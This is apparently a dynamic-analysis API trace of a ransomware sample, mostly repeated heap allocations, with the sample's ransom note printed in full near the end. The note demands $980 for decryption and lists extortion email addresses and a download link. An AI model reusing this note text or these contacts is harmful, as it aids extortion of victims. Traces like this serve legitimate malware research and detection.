wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0179.860] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.861] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0179.861] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.861] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.861] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.861] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0179.862] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.862] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.862] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.862] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0179.862] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.862] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.862] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.863] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0179.863] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.863] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.863] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.863] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0179.863] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.864] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.864] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.864] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0179.864] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.864] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.864] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.864] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0179.865] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2ec90 [0179.865] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.865] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.865] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.865] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.866] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0179.866] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.866] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.866] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.866] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0179.866] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.867] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.867] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.867] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0179.867] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.867] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.867] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.867] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0179.867] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.868] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.868] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.868] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0179.868] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.868] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.868] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.868] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0179.869] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.869] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.869] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.869] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0179.869] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.870] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.870] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.870] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0179.870] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.870] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.870] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.870] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0179.871] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.871] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.871] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.871] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0179.871] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.872] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.872] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.872] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0179.872] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.873] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.873] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.873] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0179.873] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.874] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.874] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.874] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0179.874] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.874] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.874] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.874] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0179.875] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.875] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.875] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.875] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0179.876] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.876] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.876] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.876] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0179.876] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0179.876] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.876] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.877] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.877] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.877] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0179.877] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.877] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.877] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.877] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0179.877] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2ec90 [0179.878] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.878] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.878] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.878] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.878] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0179.879] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.879] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.879] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.879] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0179.879] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.880] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.880] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.880] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0179.880] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.880] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.880] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.880] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0179.881] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.881] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.881] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.881] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0179.881] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0179.881] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.882] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.882] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.882] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.882] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0179.882] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.882] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.882] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.882] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0179.882] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.883] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.883] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.883] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0179.883] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.883] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.883] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.883] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0179.884] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.884] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.884] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.884] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0179.884] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.885] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.885] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.885] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0179.885] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.885] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.885] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.885] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0179.886] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.886] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.886] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.886] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0179.887] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.887] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.887] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.887] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0179.887] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.888] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.888] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.888] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0179.888] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0179.888] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.889] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.889] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.889] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.889] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0179.890] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.890] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.890] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.890] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0179.890] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.891] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.891] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.891] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0179.891] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.891] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.891] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.891] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0179.892] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.892] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.892] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.892] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0179.892] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.893] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.893] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.893] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0179.893] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0179.893] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.893] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.893] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.893] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.893] PathFindFileNameW (pszPath="C:\\Boot\\zh-TW\\") returned="zh-TW\\" [0179.894] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0179.894] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.894] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0179.894] PathFindFileNameW (pszPath="") returned="" [0179.894] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0179.894] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0179.894] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2d2ec90 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0179.894] FreeLibrary (hLibModule=0x759d0000) returned 1 [0179.895] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.895] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.895] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.895] PathAppendW (in: pszPath="C:\\Boot\\zh-TW\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\zh-TW\\_readme.txt") returned 1 [0179.895] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.895] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.895] PathFileExistsW (pszPath="C:\\Boot\\zh-TW\\_readme.txt") returned 0 [0179.895] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d00) returned 0x2d32670 [0179.895] lstrcpyW (in: lpString1=0x2d32670, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0179.896] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase 